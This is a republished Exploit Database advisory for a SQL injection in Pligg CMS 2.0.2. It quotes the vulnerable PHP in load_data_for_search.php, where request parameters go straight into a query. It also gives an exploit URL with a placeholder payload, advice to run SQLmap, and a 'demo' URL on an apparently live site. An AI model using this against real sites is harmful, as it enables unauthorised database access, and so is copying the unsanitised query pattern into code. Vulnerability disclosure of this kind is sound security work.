Pligg CMS 2.0.2 – ‘load_data_for_search.php’ SQL Injection

• Exploit Database
• 20 阅读

• 作者： jsass
  日期： 2015-09-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38241/

• # Exploit Title: Pligg CMS 2.0.2 SQL injection
  # Date: 29-08-2015
  # Exploit Author: jsass
  # Vendor Homepage: http://pligg.com
  # Software Link: https://github.com/Pligg/pligg-cms/archive/2.0.2.zip
  # Version: 2.0.2
  # Tested on: kali sana 2.0
  
  ################ Q8 Gray Hat Team ################
  
  
  
  SQLInjection
  
  File : load_data_for_search.php
  
  
   $search = new Search();
  	
  	if(isset($_REQUEST['start_up']) and $_REQUEST['start_up']!= '' and $_REQUEST['pagesize'] != ''){
  		
  		$pagesize = $_REQUEST['pagesize'];
  		$start_up = $_REQUEST['start_up'];
  		$limit = " LIMIT $start_up, $pagesize";	
  	}
  	if(isset($_REQUEST['sql']) and $_REQUEST['sql']!= ''){
  		$sql = $_REQUEST['sql'];
  		$search->sql = $sql.$limit;
  	}
  	
  	$fetch_link_summary = true;
  	$linksum_sql = $sql.$limit;
  
  Exploit : http://localhost/pligg-cms-master/load_data_for_search.php?sql={SQLi}
  
  Type Injection : Boolean & Time Based 
  
  Use SQLmap To Inject ..
  
  Demo : http://www.pligg.science/load_data_for_search.php?sql={SQLi}
  
  
  ################ Q8 Gray Hat Team ################
  
  Great's To : sec4ever.com && alm3refh.com